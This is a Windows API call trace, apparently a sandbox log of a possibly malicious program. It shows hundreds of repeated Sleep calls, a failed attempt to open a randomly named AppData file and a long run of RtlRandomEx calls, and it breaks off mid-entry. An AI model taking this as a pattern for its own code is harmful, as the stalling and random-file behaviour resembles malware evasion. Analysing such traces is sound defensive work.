Sleep (dwMilliseconds=0x258) [0250.024] Sleep (dwMilliseconds=0x258) [0250.040] Sleep (dwMilliseconds=0x258) [0250.102] Sleep (dwMilliseconds=0x258) [0250.150] Sleep (dwMilliseconds=0x258) [0250.170] Sleep (dwMilliseconds=0x258) [0250.181] Sleep (dwMilliseconds=0x258) [0250.196] Sleep (dwMilliseconds=0x258) [0250.234] Sleep (dwMilliseconds=0x258) [0250.242] Sleep (dwMilliseconds=0x258) [0250.305] Sleep (dwMilliseconds=0x258) [0250.352] Sleep (dwMilliseconds=0x258) [0250.382] Sleep (dwMilliseconds=0x258) [0250.383] Sleep (dwMilliseconds=0x258) [0250.399] Sleep (dwMilliseconds=0x258) [0250.414] Sleep (dwMilliseconds=0x258) [0250.430] Sleep (dwMilliseconds=0x258) [0250.445] Sleep (dwMilliseconds=0x258) [0250.462] Sleep (dwMilliseconds=0x258) [0250.523] Sleep (dwMilliseconds=0x258) [0250.555] Sleep (dwMilliseconds=0x258) [0250.590] Sleep (dwMilliseconds=0x258) [0250.601] Sleep (dwMilliseconds=0x258) [0250.617] Sleep (dwMilliseconds=0x258) [0250.632] Sleep (dwMilliseconds=0x258) [0250.648] Sleep (dwMilliseconds=0x258) [0250.719] Sleep (dwMilliseconds=0x258) [0250.757] Sleep (dwMilliseconds=0x258) [0250.830] Sleep (dwMilliseconds=0x258) [0250.836] Sleep (dwMilliseconds=0x258) [0250.851] Sleep (dwMilliseconds=0x258) [0250.866] Sleep (dwMilliseconds=0x258) [0250.929] Sleep (dwMilliseconds=0x258) [0250.976] Sleep (dwMilliseconds=0x258) [0250.991] Sleep (dwMilliseconds=0x258) [0251.007] Sleep (dwMilliseconds=0x258) [0251.023] Sleep (dwMilliseconds=0x258) [0251.040] Sleep (dwMilliseconds=0x258) [0251.054] Sleep (dwMilliseconds=0x258) [0251.069] Sleep (dwMilliseconds=0x258) [0251.131] Sleep (dwMilliseconds=0x258) [0251.178] Sleep (dwMilliseconds=0x258) [0251.202] Sleep (dwMilliseconds=0x258) [0251.210] Sleep (dwMilliseconds=0x258) [0251.225] Sleep (dwMilliseconds=0x258) [0251.241] Sleep (dwMilliseconds=0x258) [0251.258] Sleep (dwMilliseconds=0x258) [0251.272] Sleep (dwMilliseconds=0x258) [0251.334] Sleep (dwMilliseconds=0x258) [0251.382] Sleep (dwMilliseconds=0x258) [0251.403] Sleep (dwMilliseconds=0x258) [0251.412] Sleep (dwMilliseconds=0x258) [0251.428] Sleep (dwMilliseconds=0x258) [0251.444] Sleep (dwMilliseconds=0x258) [0251.459] Sleep (dwMilliseconds=0x258) [0251.475] Sleep (dwMilliseconds=0x258) [0251.537] Sleep (dwMilliseconds=0x258) [0251.584] Sleep (dwMilliseconds=0x258) [0251.603] Sleep (dwMilliseconds=0x258) [0251.615] Sleep (dwMilliseconds=0x258) [0251.631] Sleep (dwMilliseconds=0x258) [0251.647] Sleep (dwMilliseconds=0x258) [0251.662] Sleep (dwMilliseconds=0x258) [0251.678] Sleep (dwMilliseconds=0x258) [0251.756] Sleep (dwMilliseconds=0x258) [0251.803] Sleep (dwMilliseconds=0x258) [0251.828] Sleep (dwMilliseconds=0x258) [0251.838] Sleep (dwMilliseconds=0x258) [0251.850] Sleep (dwMilliseconds=0x258) [0251.865] Sleep (dwMilliseconds=0x258) [0251.881] Sleep (dwMilliseconds=0x258) [0251.896] Sleep (dwMilliseconds=0x258) [0251.959] Sleep (dwMilliseconds=0x258) [0252.006] Sleep (dwMilliseconds=0x258) [0252.043] Sleep (dwMilliseconds=0x258) [0252.052] Sleep (dwMilliseconds=0x258) [0252.068] Sleep (dwMilliseconds=0x258) [0252.083] Sleep (dwMilliseconds=0x258) [0252.099] Sleep (dwMilliseconds=0x258) [0252.115] Sleep (dwMilliseconds=0x258) [0252.177] Sleep (dwMilliseconds=0x258) [0252.223] Sleep (dwMilliseconds=0x258) [0252.240] Sleep (dwMilliseconds=0x258) [0252.255] Sleep (dwMilliseconds=0x258) [0252.270] Sleep (dwMilliseconds=0x258) [0252.289] Sleep (dwMilliseconds=0x258) [0252.302] Sleep (dwMilliseconds=0x258) [0252.317] Sleep (dwMilliseconds=0x258) [0252.379] Sleep (dwMilliseconds=0x258) [0252.427] Sleep (dwMilliseconds=0x258) [0252.456] Sleep (dwMilliseconds=0x258) [0252.457] Sleep (dwMilliseconds=0x258) [0252.474] Sleep (dwMilliseconds=0x258) [0252.489] Sleep (dwMilliseconds=0x258) [0252.505] Sleep (dwMilliseconds=0x258) [0252.520] Sleep (dwMilliseconds=0x258) [0252.536] Sleep (dwMilliseconds=0x258) [0252.645] Sleep (dwMilliseconds=0x258) [0252.666] Sleep (dwMilliseconds=0x258) [0252.676] Sleep (dwMilliseconds=0x258) [0252.692] Sleep (dwMilliseconds=0x258) [0252.723] Sleep (dwMilliseconds=0x258) [0252.738] Sleep (dwMilliseconds=0x258) [0252.809] Sleep (dwMilliseconds=0x258) [0252.848] Sleep (dwMilliseconds=0x258) [0252.896] Sleep (dwMilliseconds=0x258) [0252.911] Sleep (dwMilliseconds=0x258) [0252.925] Sleep (dwMilliseconds=0x258) [0252.941] Sleep (dwMilliseconds=0x258) [0252.957] Sleep (dwMilliseconds=0x258) [0253.019] Sleep (dwMilliseconds=0x258) [0253.066] Sleep (dwMilliseconds=0x258) [0253.086] Sleep (dwMilliseconds=0x258) [0253.104] Sleep (dwMilliseconds=0x258) [0253.113] Sleep (dwMilliseconds=0x258) [0253.129] Sleep (dwMilliseconds=0x258) [0253.144] Sleep (dwMilliseconds=0x258) [0253.160] Sleep (dwMilliseconds=0x258) [0253.222] Sleep (dwMilliseconds=0x258) [0253.269] Sleep (dwMilliseconds=0x258) [0253.301] Sleep (dwMilliseconds=0x258) [0253.316] Sleep (dwMilliseconds=0x258) [0253.331] Sleep (dwMilliseconds=0x258) [0253.347] Sleep (dwMilliseconds=0x258) [0253.363] Sleep (dwMilliseconds=0x258) [0253.378] Sleep (dwMilliseconds=0x258) [0253.440] Sleep (dwMilliseconds=0x258) [0253.488] Sleep (dwMilliseconds=0x258) [0253.538] Sleep (dwMilliseconds=0x258) [0253.550] Sleep (dwMilliseconds=0x258) [0253.565] Sleep (dwMilliseconds=0x258) [0253.581] Sleep (dwMilliseconds=0x258) [0253.597] Sleep (dwMilliseconds=0x258) [0253.659] Sleep (dwMilliseconds=0x258) [0253.715] Sleep (dwMilliseconds=0x258) [0253.736] Sleep (dwMilliseconds=0x258) [0253.737] Sleep (dwMilliseconds=0x258) [0253.752] Sleep (dwMilliseconds=0x258) [0253.769] Sleep (dwMilliseconds=0x258) [0253.784] Sleep (dwMilliseconds=0x258) [0253.811] Sleep (dwMilliseconds=0x258) [0253.815] Sleep (dwMilliseconds=0x258) [0253.878] Sleep (dwMilliseconds=0x258) [0253.924] Sleep (dwMilliseconds=0x258) [0253.962] Sleep (dwMilliseconds=0x258) [0253.971] Sleep (dwMilliseconds=0x258) [0253.987] Sleep (dwMilliseconds=0x258) [0254.002] Sleep (dwMilliseconds=0x258) [0254.017] Sleep (dwMilliseconds=0x258) [0254.033] Sleep (dwMilliseconds=0x258) [0254.096] Sleep (dwMilliseconds=0x258) [0254.142] Sleep (dwMilliseconds=0x258) [0254.159] Sleep (dwMilliseconds=0x258) [0254.174] Sleep (dwMilliseconds=0x258) [0254.189] Sleep (dwMilliseconds=0x258) [0254.206] Sleep (dwMilliseconds=0x258) [0254.220] Sleep (dwMilliseconds=0x258) [0254.236] Sleep (dwMilliseconds=0x258) [0254.299] Sleep (dwMilliseconds=0x258) [0254.346] Sleep (dwMilliseconds=0x258) [0254.382] Sleep (dwMilliseconds=0x258) [0254.392] Sleep (dwMilliseconds=0x258) [0254.408] Sleep (dwMilliseconds=0x258) [0254.424] Sleep (dwMilliseconds=0x258) [0254.441] Sleep (dwMilliseconds=0x258) [0254.455] Sleep (dwMilliseconds=0x258) [0254.517] Sleep (dwMilliseconds=0x258) [0254.565] Sleep (dwMilliseconds=0x258) [0254.597] Sleep (dwMilliseconds=0x258) [0254.610] Sleep (dwMilliseconds=0x258) [0254.626] Sleep (dwMilliseconds=0x258) [0254.642] Sleep (dwMilliseconds=0x258) [0254.657] Sleep (dwMilliseconds=0x258) [0254.674] Sleep (dwMilliseconds=0x258) [0254.735] Sleep (dwMilliseconds=0x258) [0254.783] Sleep (dwMilliseconds=0x258) [0254.809] Sleep (dwMilliseconds=0x258) [0254.813] Sleep (dwMilliseconds=0x258) [0254.829] Sleep (dwMilliseconds=0x258) [0254.845] Sleep (dwMilliseconds=0x258) [0254.860] Sleep (dwMilliseconds=0x258) [0254.875] Sleep (dwMilliseconds=0x258) [0254.892] Sleep (dwMilliseconds=0x258) [0254.954] Sleep (dwMilliseconds=0x258) [0255.014] Sleep (dwMilliseconds=0x258) [0255.022] Sleep (dwMilliseconds=0x258) [0255.032] Sleep (dwMilliseconds=0x258) [0255.048] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x26) returned 0x82f2300 [0255.048] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x591995a6 [0255.050] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x126) returned 0x82f23d0 [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6329dd16 [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3f9ebabd [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4e13471 [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x329e5461 [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2af09239 [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3036a145 [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x61cb0363 [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x68d3c6ab [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x276c91c6 [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2193efdf [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x73d588bd [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1bce9f5d [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b1b58 [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5879148c [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x211c07af [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x10289199 [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5bd16964 [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6779bdcb [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x793e060b [0255.050] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x10ea5d8f [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x36f0c140 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7199551a [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43e22c1 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2b3a7412 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x47159ae9 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7074bb5 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2d06630c [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7c7e083f [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6aa6ccbc [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x10081df1 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4cd0e5ee [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3970a76f [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x25b777ac [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2be77079 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x384e193b [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x345b764a [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4b181b07 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5a8e794b [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x40230c66 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x24175c67 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x558d08e5 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x76bc15f6 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2447356 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x277b8ae6 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x64f64815 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x39503b92 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x69707102 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9099470 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x399b9075 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x26f3e6ad [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x16180d91 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4965e558 [0255.051] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2bf49acd [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x35faeb31 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7c155f9d [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x390bf3c5 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c337a0b [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x193690f0 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x69949205 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x64157b78 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1c5187cd [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2cb65b22 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb4b62bd [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x49252ee [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x58178a30 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xa823996 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x26c67467 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7dcae99a [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb78cb36 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x460bd080 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x8620f25 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3a5dbfd2 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x386305f6 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x573323a7 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5cb92434 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x77d91163 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x460fba03 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x590d6d41 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3edc75ad [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x23992211 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5191ae88 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x461eb76a [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1e30443f [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21c85622 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x691aef28 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4f93c338 [0255.052] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x701fe1d2 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x56d5df89 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf04f38f [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2316ff25 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x66e7e80a [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5f6de4cf [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4ad31946 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x12e4eb84 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x14f15f56 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21c68c3 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3d2838cd [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x689e6d22 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x412f9f47 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x77456655 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1c0420d4 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x12bcc6bd [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43c1ba28 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x73e91527 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7afb740e [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x44b5a434 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b5b0d8 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5296397 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x259400e6 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3d81b1a8 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x17cad09 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4d6871d9 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x66aeee3b [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3181b5f6 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x438abf50 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x459a7d [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2ce181eb [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x68cd1d53 [0255.053] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3f236b44 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x556ed501 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3b1b2a0f [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6e45e52d [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x166ef79e [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xa784ab1 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x543297c8 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x26d976dd [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x20459a18 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xea7fe77 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x616b3a6 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb0d07ea [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x244451e [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1c1b2ee5 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1a5b5545 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x35096774 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7f471ce5 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x78301b63 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xcfff798 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x60070f3 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf512773 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x756587ab [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2411fec4 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b9a25e6 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x57b2bb43 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6baabf82 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x32b1a1df [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5e677df9 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x263ee6eb [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x33803e0 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x192e7cc9 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1fe9f15b [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1b28ec72 [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6882240c [0255.054] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x16009712 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1fb9c2c0 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x609b3351 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4b67e8c5 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x24dc5351 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x182e6d2e [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4b773f33 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1ac23271 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7d2987ce [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x282a4fd1 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x71d161ef [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x52d96cb3 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21500ece [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3df046e0 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c077571 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x75e3d679 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3293ed09 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x10761207 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x71ad3d8b [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x34fe4b21 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c60e8ea [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7e3505a5 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6295e502 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3eb959fa [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x11aee740 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x60326a05 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x62b5f1ae [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5a51d6b6 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6dfe8890 [0255.055] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c748b5c [0255.055] RtlRandomEx 